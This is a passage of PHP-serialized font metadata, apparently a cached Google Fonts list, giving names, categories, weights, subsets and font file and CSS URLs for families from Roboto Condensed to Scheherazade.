:60:"https://fonts.googleapis.com/css?family=Roboto+Condensed:300";s:9:"300italic";s:66:"https://fonts.googleapis.com/css?family=Roboto+Condensed:300italic";s:7:"regular";s:64:"https://fonts.googleapis.com/css?family=Roboto+Condensed:regular";s:6:"italic";s:63:"https://fonts.googleapis.com/css?family=Roboto+Condensed:italic";i:700;s:60:"https://fonts.googleapis.com/css?family=Roboto+Condensed:700";s:9:"700italic";s:66:"https://fonts.googleapis.com/css?family=Roboto+Condensed:700italic";}}s:11:"roboto_mono";a:7:{s:4:"name";s:11:"Roboto Mono";s:8:"category";s:9:"monospace";s:9:"font_type";s:6:"google";s:12:"font_weights";a:10:{i:0;s:3:"100";i:1;s:9:"100italic";i:2;s:3:"300";i:3;s:9:"300italic";i:4;s:7:"regular";i:5;s:6:"italic";i:6;s:3:"500";i:7;s:9:"500italic";i:8;s:3:"700";i:9;s:9:"700italic";}s:7:"subsets";a:7:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:10:"vietnamese";i:4;s:12:"cyrillic-ext";i:5;s:9:"latin-ext";i:6;s:8:"cyrillic";}s:5:"files";a:10:{i:100;s:88:"http://fonts.gstatic.com/s/robotomono/v4/aOIeRp72J9_Hp_8KwQ9M-YAWxXGWZ3yJw6KhWS7MxOk.ttf";s:9:"100italic";s:88:"http://fonts.gstatic.com/s/robotomono/v4/rqQ1zSE-ZGCKVZgew-A9dgyDtfpXZi-8rXUZYR4dumU.ttf";i:300;s:88:"http://fonts.gstatic.com/s/robotomono/v4/N4duVc9C58uwPiY8_59Fzy9-WlPSxbfiI49GsXo3q0g.ttf";s:9:"300italic";s:88:"http://fonts.gstatic.com/s/robotomono/v4/1OsMuiiO6FCF2x67vzDKA2o9eWDfYYxG3A176Zl7aIg.ttf";s:7:"regular";s:88:"http://fonts.gstatic.com/s/robotomono/v4/eJ4cxQe85Lo39t-LVoKa26CWcynf_cDxXwCLxiixG1c.ttf";s:6:"italic";s:88:"http://fonts.gstatic.com/s/robotomono/v4/mE0EPT_93c7f86_WQexR3EeOrDcLawS7-ssYqLr2Xp4.ttf";i:500;s:88:"http://fonts.gstatic.com/s/robotomono/v4/N4duVc9C58uwPiY8_59Fz8CNfqCYlB_eIx7H1TVXe60.ttf";s:9:"500italic";s:88:"http://fonts.gstatic.com/s/robotomono/v4/1OsMuiiO6FCF2x67vzDKA2nWRcJAYo5PSCx8UfGMHCI.ttf";i:700;s:88:"http://fonts.gstatic.com/s/robotomono/v4/N4duVc9C58uwPiY8_59Fz3e1Pd76Vl7zRpE7NLJQ7XU.ttf";s:9:"700italic";s:88:"http://fonts.gstatic.com/s/robotomono/v4/1OsMuiiO6FCF2x67vzDKA8_zJjSACmk0BRPxQqhnNLU.ttf";}s:4:"urls";a:10:{i:100;s:55:"https://fonts.googleapis.com/css?family=Roboto+Mono:100";s:9:"100italic";s:61:"https://fonts.googleapis.com/css?family=Roboto+Mono:100italic";i:300;s:55:"https://fonts.googleapis.com/css?family=Roboto+Mono:300";s:9:"300italic";s:61:"https://fonts.googleapis.com/css?family=Roboto+Mono:300italic";s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Roboto+Mono:regular";s:6:"italic";s:58:"https://fonts.googleapis.com/css?family=Roboto+Mono:italic";i:500;s:55:"https://fonts.googleapis.com/css?family=Roboto+Mono:500";s:9:"500italic";s:61:"https://fonts.googleapis.com/css?family=Roboto+Mono:500italic";i:700;s:55:"https://fonts.googleapis.com/css?family=Roboto+Mono:700";s:9:"700italic";s:61:"https://fonts.googleapis.com/css?family=Roboto+Mono:700italic";}}s:11:"roboto_slab";a:7:{s:4:"name";s:11:"Roboto Slab";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:3:"100";i:1;s:3:"300";i:2;s:7:"regular";i:3;s:3:"700";}s:7:"subsets";a:7:{i:0;s:5:"latin";i:1;s:5:"greek";i:2;s:9:"greek-ext";i:3;s:10:"vietnamese";i:4;s:12:"cyrillic-ext";i:5;s:9:"latin-ext";i:6;s:8:"cyrillic";}s:5:"files";a:4:{i:100;s:88:"http://fonts.gstatic.com/s/robotoslab/v6/MEz38VLIFL-t46JUtkIEgIAWxXGWZ3yJw6KhWS7MxOk.ttf";i:300;s:88:"http://fonts.gstatic.com/s/robotoslab/v6/dazS1PrQQuCxC3iOAJFEJS9-WlPSxbfiI49GsXo3q0g.ttf";s:7:"regular";s:88:"http://fonts.gstatic.com/s/robotoslab/v6/3__ulTNA7unv0UtplybPiqCWcynf_cDxXwCLxiixG1c.ttf";i:700;s:88:"http://fonts.gstatic.com/s/robotoslab/v6/dazS1PrQQuCxC3iOAJFEJXe1Pd76Vl7zRpE7NLJQ7XU.ttf";}s:4:"urls";a:4:{i:100;s:55:"https://fonts.googleapis.com/css?family=Roboto+Slab:100";i:300;s:55:"https://fonts.googleapis.com/css?family=Roboto+Slab:300";s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Roboto+Slab:regular";i:700;s:55:"https://fonts.googleapis.com/css?family=Roboto+Slab:700";}}s:9:"rochester";a:7:{s:4:"name";s:9:"Rochester";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/rochester/v6/bnj8tmQBiOkdji_G_yvypg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Rochester:regular";}}s:9:"rock_salt";a:7:{s:4:"name";s:9:"Rock Salt";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/rocksalt/v6/Zy7JF9h9WbhD9V3SFMQ1UQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Rock+Salt:regular";}}s:7:"rokkitt";a:7:{s:4:"name";s:7:"Rokkitt";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:2:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/rokkitt/v10/GMA7Z_ToF8uSvpZAgnp_VQ.ttf";i:700;s:86:"http://fonts.gstatic.com/s/rokkitt/v10/gxlo-sr3rPmvgSixYog_ofesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Rokkitt:regular";i:700;s:51:"https://fonts.googleapis.com/css?family=Rokkitt:700";}}s:9:"romanesco";a:7:{s:4:"name";s:9:"Romanesco";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:66:"http://fonts.gstatic.com/s/romanesco/v5/2udIjUrpK_CPzYSxRVzD4Q.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Romanesco:regular";}}s:9:"ropa_sans";a:7:{s:4:"name";s:9:"Ropa Sans";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/ropasans/v5/Gba7ZzVBuhg6nX_AoSwlkQ.ttf";s:6:"italic";s:86:"http://fonts.gstatic.com/s/ropasans/v5/V1zbhZQscNrh63dy5Jk2nqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:2:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Ropa+Sans:regular";s:6:"italic";s:56:"https://fonts.googleapis.com/css?family=Ropa+Sans:italic";}}s:7:"rosario";a:7:{s:4:"name";s:7:"Rosario";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:4:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/rosario/v11/bL-cEh8dXtDupB2WccA2LA.ttf";s:6:"italic";s:65:"http://fonts.gstatic.com/s/rosario/v11/pkflNy18HEuVVx4EOjeb_Q.ttf";i:700;s:86:"http://fonts.gstatic.com/s/rosario/v11/nrS6PJvDWN42RP4TFWccd_esZW2xOQ-xsNqO47m55DA.ttf";s:9:"700italic";s:86:"http://fonts.gstatic.com/s/rosario/v11/EOgFX2Va5VGrkhn_eDpIRS3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:4:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Rosario:regular";s:6:"italic";s:54:"https://fonts.googleapis.com/css?family=Rosario:italic";i:700;s:51:"https://fonts.googleapis.com/css?family=Rosario:700";s:9:"700italic";s:57:"https://fonts.googleapis.com/css?family=Rosario:700italic";}}s:8:"rosarivo";a:7:{s:4:"name";s:8:"Rosarivo";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/rosarivo/v4/EmPiINK0qyqc7KSsNjJamA.ttf";s:6:"italic";s:86:"http://fonts.gstatic.com/s/rosarivo/v4/u3VuWsWQlX1pDqsbz4paNPesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Rosarivo:regular";s:6:"italic";s:55:"https://fonts.googleapis.com/css?family=Rosarivo:italic";}}s:12:"rouge_script";a:7:{s:4:"name";s:12:"Rouge Script";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:89:"http://fonts.gstatic.com/s/rougescript/v5/AgXDSqZJmy12qS0ixjs6Vy3USBnSvpkopQaUR-2r7iU.ttf";}s:4:"urls";a:1:{s:7:"regular";s:60:"https://fonts.googleapis.com/css?family=Rouge+Script:regular";}}s:9:"rozha_one";a:7:{s:4:"name";s:9:"Rozha One";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/rozhaone/v2/PyrMHQ6lucEIxwKmhqsX8A.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Rozha+One:regular";}}s:5:"rubik";a:7:{s:4:"name";s:5:"Rubik";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:10:{i:0;s:3:"300";i:1;s:9:"300italic";i:2;s:7:"regular";i:3;s:6:"italic";i:4;s:3:"500";i:5;s:9:"500italic";i:6;s:3:"700";i:7;s:9:"700italic";i:8;s:3:"900";i:9;s:9:"900italic";}s:7:"subsets";a:4:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:6:"hebrew";i:3;s:8:"cyrillic";}s:5:"files";a:10:{i:300;s:62:"http://fonts.gstatic.com/s/rubik/v2/o1vXYO8YwDpErHEAPAxpOg.ttf";s:9:"300italic";s:83:"http://fonts.gstatic.com/s/rubik/v2/NyXDvUhvZLSWiVfGa5KM-vesZW2xOQ-xsNqO47m55DA.ttf";s:7:"regular";s:62:"http://fonts.gstatic.com/s/rubik/v2/4sMyW_teKWHB3K8Hm-Il6A.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/rubik/v2/elD65ddI0qvNcCh42b1Iqg.ttf";i:500;s:62:"http://fonts.gstatic.com/s/rubik/v2/D4HihERG27s-BJrQ4dvkbw.ttf";s:9:"500italic";s:83:"http://fonts.gstatic.com/s/rubik/v2/0hcxMdoMbXtHiEM1ebdN6PesZW2xOQ-xsNqO47m55DA.ttf";i:700;s:62:"http://fonts.gstatic.com/s/rubik/v2/m1GGHcpLe6Mb0_sAyjXE4g.ttf";s:9:"700italic";s:83:"http://fonts.gstatic.com/s/rubik/v2/R4g_rs714cUXVZcdnRdHw_esZW2xOQ-xsNqO47m55DA.ttf";i:900;s:62:"http://fonts.gstatic.com/s/rubik/v2/mOHfPRl5uP4vw7-5-dbnng.ttf";s:9:"900italic";s:83:"http://fonts.gstatic.com/s/rubik/v2/HH1b7kBbwInqlw8OQxRE5vesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:10:{i:300;s:49:"https://fonts.googleapis.com/css?family=Rubik:300";s:9:"300italic";s:55:"https://fonts.googleapis.com/css?family=Rubik:300italic";s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Rubik:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Rubik:italic";i:500;s:49:"https://fonts.googleapis.com/css?family=Rubik:500";s:9:"500italic";s:55:"https://fonts.googleapis.com/css?family=Rubik:500italic";i:700;s:49:"https://fonts.googleapis.com/css?family=Rubik:700";s:9:"700italic";s:55:"https://fonts.googleapis.com/css?family=Rubik:700italic";i:900;s:49:"https://fonts.googleapis.com/css?family=Rubik:900";s:9:"900italic";s:55:"https://fonts.googleapis.com/css?family=Rubik:900italic";}}s:14:"rubik_mono_one";a:7:{s:4:"name";s:14:"Rubik Mono One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:90:"http://fonts.gstatic.com/s/rubikmonoone/v5/e_cupPtD4BrZzotubJD7UbAREgn5xbW23GEXXnhMQ5Y.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Rubik+Mono+One:regular";}}s:9:"rubik_one";a:7:{s:4:"name";s:9:"Rubik One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/rubikone/v4/Zs6TtctNRSIR8T5PO018rQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Rubik+One:regular";}}s:4:"ruda";a:7:{s:4:"name";s:4:"Ruda";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:3:{i:0;s:7:"regular";i:1;s:3:"700";i:2;s:3:"900";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:3:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/ruda/v7/jPEIPB7DM2DNK_uBGv2HGw.ttf";i:700;s:61:"http://fonts.gstatic.com/s/ruda/v7/JABOu1SYOHcGXVejUq4w6g.ttf";i:900;s:61:"http://fonts.gstatic.com/s/ruda/v7/Uzusv-enCjoIrznlJJaBRw.ttf";}s:4:"urls";a:3:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Ruda:regular";i:700;s:48:"https://fonts.googleapis.com/css?family=Ruda:700";i:900;s:48:"https://fonts.googleapis.com/css?family=Ruda:900";}}s:6:"rufina";a:7:{s:4:"name";s:6:"Rufina";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/rufina/v4/s9IFr_fIemiohfZS-ZRDbQ.ttf";i:700;s:63:"http://fonts.gstatic.com/s/rufina/v4/D0RUjXFr55y4MVZY2Ww_RA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Rufina:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Rufina:700";}}s:11:"ruge_boogie";a:7:{s:4:"name";s:11:"Ruge Boogie";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/rugeboogie/v7/U-TTmltL8aENLVIqYbI5QaCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Ruge+Boogie:regular";}}s:6:"ruluko";a:7:{s:4:"name";s:6:"Ruluko";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/ruluko/v4/lv4cMwJtrx_dzmlK5SDc1g.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Ruluko:regular";}}s:10:"rum_raisin";a:7:{s:4:"name";s:10:"Rum Raisin";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:87:"http://fonts.gstatic.com/s/rumraisin/v4/kDiL-ntDOEq26B7kYM7cx_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Rum+Raisin:regular";}}s:14:"ruslan_display";a:7:{s:4:"name";s:14:"Ruslan Display";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:91:"http://fonts.gstatic.com/s/ruslandisplay/v7/SREdhlyLNUfU1VssRBfs3rgH88D3l9N4auRNHrNS708.ttf";}s:4:"urls";a:1:{s:7:"regular";s:62:"https://fonts.googleapis.com/css?family=Ruslan+Display:regular";}}s:9:"russo_one";a:7:{s:4:"name";s:9:"Russo One";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/russoone/v5/zfwxZ--UhUc7FVfgT21PRQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:57:"https://fonts.googleapis.com/css?family=Russo+One:regular";}}s:6:"ruthie";a:7:{s:4:"name";s:6:"Ruthie";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/ruthie/v6/vJ2LorukHSbWYoEs5juivg.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Ruthie:regular";}}s:3:"rye";a:7:{s:4:"name";s:3:"Rye";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:60:"http://fonts.gstatic.com/s/rye/v4/VUrJlpPpSZxspl3w_yNOrQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:51:"https://fonts.googleapis.com/css?family=Rye:regular";}}s:10:"sacramento";a:7:{s:4:"name";s:10:"Sacramento";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/sacramento/v4/_kv-qycSHMNdhjiv0Kj7BvesZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:58:"https://fonts.googleapis.com/css?family=Sacramento:regular";}}s:7:"sahitya";a:7:{s:4:"name";s:7:"Sahitya";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:10:"devanagari";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/sahitya/v1/wQWULcDbZqljdTfjOUtDvw.ttf";i:700;s:85:"http://fonts.gstatic.com/s/sahitya/v1/Zm5hNvMwUyN3tC4GMkH1l_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Sahitya:regular";i:700;s:51:"https://fonts.googleapis.com/css?family=Sahitya:700";}}s:4:"sail";a:7:{s:4:"name";s:4:"Sail";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:61:"http://fonts.gstatic.com/s/sail/v7/iuEoG6kt-bePGvtdpL0GUQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:52:"https://fonts.googleapis.com/css?family=Sail:regular";}}s:5:"salsa";a:7:{s:4:"name";s:5:"Salsa";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/salsa/v6/BnpUCBmYdvggScEPs5JbpA.ttf";}s:4:"urls";a:1:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Salsa:regular";}}s:7:"sanchez";a:7:{s:4:"name";s:7:"Sanchez";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:6:"italic";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:2:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/sanchez/v4/BEL8ao-E2LJ5eHPLB2UAiw.ttf";s:6:"italic";s:64:"http://fonts.gstatic.com/s/sanchez/v4/iSrhkWLexUZzDeNxNEHtzA.ttf";}s:4:"urls";a:2:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Sanchez:regular";s:6:"italic";s:54:"https://fonts.googleapis.com/css?family=Sanchez:italic";}}s:8:"sancreek";a:7:{s:4:"name";s:8:"Sancreek";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/sancreek/v7/8ZacBMraWMvHly4IJI3esw.ttf";}s:4:"urls";a:1:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Sancreek:regular";}}s:11:"sansita_one";a:7:{s:4:"name";s:11:"Sansita One";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:88:"http://fonts.gstatic.com/s/sansitaone/v6/xWqf68oB50JXqGIRR0h2hqCWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:1:{s:7:"regular";s:59:"https://fonts.googleapis.com/css?family=Sansita+One:regular";}}s:6:"sarala";a:7:{s:4:"name";s:6:"Sarala";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:2:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/sarala/v1/ohip9lixCHoBab7hTtgLnw.ttf";i:700;s:63:"http://fonts.gstatic.com/s/sarala/v1/hpc9cz8KYsazwq2In_oJYw.ttf";}s:4:"urls";a:2:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Sarala:regular";i:700;s:50:"https://fonts.googleapis.com/css?family=Sarala:700";}}s:6:"sarina";a:7:{s:4:"name";s:6:"Sarina";s:8:"category";s:7:"display";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:2:{i:0;s:5:"latin";i:1;s:9:"latin-ext";}s:5:"files";a:1:{s:7:"regular";s:63:"http://fonts.gstatic.com/s/sarina/v5/XYtRfaSknHIU3NHdfTdXoQ.ttf";}s:4:"urls";a:1:{s:7:"regular";s:54:"https://fonts.googleapis.com/css?family=Sarina:regular";}}s:8:"sarpanch";a:7:{s:4:"name";s:8:"Sarpanch";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:6:{i:0;s:7:"regular";i:1;s:3:"500";i:2;s:3:"600";i:3;s:3:"700";i:4;s:3:"800";i:5;s:3:"900";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:10:"devanagari";}s:5:"files";a:6:{s:7:"regular";s:65:"http://fonts.gstatic.com/s/sarpanch/v1/YMBZdT27b6O5a1DADbAGSg.ttf";i:500;s:86:"http://fonts.gstatic.com/s/sarpanch/v1/Ov7BxSrFSZYrfuJxL1LzQaCWcynf_cDxXwCLxiixG1c.ttf";i:600;s:86:"http://fonts.gstatic.com/s/sarpanch/v1/WTnP2wnc0qSbUaaDG-2OQ6CWcynf_cDxXwCLxiixG1c.ttf";i:700;s:86:"http://fonts.gstatic.com/s/sarpanch/v1/57kYsSpovYmFaEt2hsZhv6CWcynf_cDxXwCLxiixG1c.ttf";i:800;s:86:"http://fonts.gstatic.com/s/sarpanch/v1/OKyqPLjdnuVghR-1TV6RzaCWcynf_cDxXwCLxiixG1c.ttf";i:900;s:86:"http://fonts.gstatic.com/s/sarpanch/v1/JhYc2cr6kqWTo_P0vfvJR6CWcynf_cDxXwCLxiixG1c.ttf";}s:4:"urls";a:6:{s:7:"regular";s:56:"https://fonts.googleapis.com/css?family=Sarpanch:regular";i:500;s:52:"https://fonts.googleapis.com/css?family=Sarpanch:500";i:600;s:52:"https://fonts.googleapis.com/css?family=Sarpanch:600";i:700;s:52:"https://fonts.googleapis.com/css?family=Sarpanch:700";i:800;s:52:"https://fonts.googleapis.com/css?family=Sarpanch:800";i:900;s:52:"https://fonts.googleapis.com/css?family=Sarpanch:900";}}s:7:"satisfy";a:7:{s:4:"name";s:7:"Satisfy";s:8:"category";s:11:"handwriting";s:9:"font_type";s:6:"google";s:12:"font_weights";a:1:{i:0;s:7:"regular";}s:7:"subsets";a:1:{i:0;s:5:"latin";}s:5:"files";a:1:{s:7:"regular";s:64:"http://fonts.gstatic.com/s/satisfy/v6/PRlyepkd-JCGHiN8e9WV2w.ttf";}s:4:"urls";a:1:{s:7:"regular";s:55:"https://fonts.googleapis.com/css?family=Satisfy:regular";}}s:5:"scada";a:7:{s:4:"name";s:5:"Scada";s:8:"category";s:10:"sans-serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:4:{i:0;s:7:"regular";i:1;s:6:"italic";i:2;s:3:"700";i:3;s:9:"700italic";}s:7:"subsets";a:3:{i:0;s:5:"latin";i:1;s:9:"latin-ext";i:2;s:8:"cyrillic";}s:5:"files";a:4:{s:7:"regular";s:62:"http://fonts.gstatic.com/s/scada/v4/iZNC3ZEYwe3je6H-28d5Ug.ttf";s:6:"italic";s:62:"http://fonts.gstatic.com/s/scada/v4/PCGyLT1qNawkOUQ3uHFhBw.ttf";i:700;s:62:"http://fonts.gstatic.com/s/scada/v4/t6XNWdMdVWUz93EuRVmifQ.ttf";s:9:"700italic";s:83:"http://fonts.gstatic.com/s/scada/v4/kLrBIf7V4mDMwcd_Yw7-D_esZW2xOQ-xsNqO47m55DA.ttf";}s:4:"urls";a:4:{s:7:"regular";s:53:"https://fonts.googleapis.com/css?family=Scada:regular";s:6:"italic";s:52:"https://fonts.googleapis.com/css?family=Scada:italic";i:700;s:49:"https://fonts.googleapis.com/css?family=Scada:700";s:9:"700italic";s:55:"https://fonts.googleapis.com/css?family=Scada:700italic";}}s:12:"scheherazade";a:7:{s:4:"name";s:12:"Scheherazade";s:8:"category";s:5:"serif";s:9:"font_type";s:6:"google";s:12:"font_weights";a:2:{i:0;s:7:"regular";i:1;s:3:"700";}